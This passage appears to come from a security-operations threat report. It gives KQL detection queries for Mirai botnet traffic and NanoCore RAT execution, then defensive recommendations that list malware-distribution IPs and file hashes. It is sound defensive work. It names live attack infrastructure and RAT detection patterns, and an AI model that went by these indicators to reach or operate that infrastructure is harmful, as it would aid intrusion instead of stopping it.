| where TimeGenerated > ago(24h)
| where DestinationIP in (mirai_ips) or SourceIP in (mirai_ips)
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, RequestURL, Activity, DeviceVendor, DeviceProduct
| order by TimeGenerated desc
SENTINEL Detect NanoCore RAT Execution — Fake Application Delivery Vector

Identifies file creation or process execution matching the NanoCore RAT hash from MalwareBazaar, correlated with maltrail fakeapp.txt updates indicating active fake application delivery campaigns.

SecurityEvent
| where TimeGenerated > ago(24h)
| where EventID in (4688, 4663)
| where CommandLine has_any (
    'b03c21000c03bb01455f622d56c8b074bb3a1b1586f79ca8279456916016a13f',
    'NanoCore',
    'nanocore'
)
// union is a tabular operator and must be chained with a leading pipe; without it the query does not parse
| union (
    DeviceProcessEvents
    | where TimeGenerated > ago(24h)
    | where SHA256 == 'b03c21000c03bb01455f622d56c8b074bb3a1b1586f79ca8279456916016a13f'
    | project TimeGenerated, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName
)
| order by TimeGenerated desc
✅ Recommended Actions
→ IMMEDIATE: Block all four URLhaus-confirmed malware distribution IPs (119.52.128.201, 140.237.38.80, 117.26.82.69, 42.235.88.133) at perimeter firewall on all ports — these IPs are actively serving Mirai payloads
→ IMMEDIATE: Submit all five MalwareBazaar hashes (1394f1bb..., 07207f62..., 42e118f1..., 742802ec..., b03c2100...) to EDR/AV for immediate blocking and retrospective scan
→ IMMEDIATE: Run MDE KQL query for shell-based malware download patterns — any match involving /tmp/ or /dev/shm/ binary creation should trigger immediate Linux host isolation
→ SHORT-TERM: Audit all Linux servers and IoT devices for Telnet service exposure — disable Telnet on all managed assets and restrict SSH to key-based authentication only, eliminating Mirai's primary brute-force propagation vector
→ SHORT-TERM: Review network flow data for anomalous outbound traffic patterns from Linux servers and IoT segments — Mirai-recruited hosts will exhibit periodic C2 beaconing and potential DDoS traffic generation
→ SHORT-TERM: Apply Linux Kernel patch for CVE-2026-31431 (CISA KEV) on all Linux servers — this vulnerability may be used by botnet operators to escalate privileges on partially compromised hosts
→ SHORT-TERM: Implement network segmentation to isolate IoT devices from enterprise server infrastructure — prevent lateral spread of Mirai infection across network segments
→ LONG-TERM: Deploy runtime security tooling (Falco, Wazuh) on all Linux hosts to detect ELF binary execution from world-writable directories and anomalous shell command chains
→ LONG-TERM: Evaluate deployment of network-based anomaly detection to identify Mirai-style scanning and brute-force activity originating from internal hosts that have been recruited into the botnet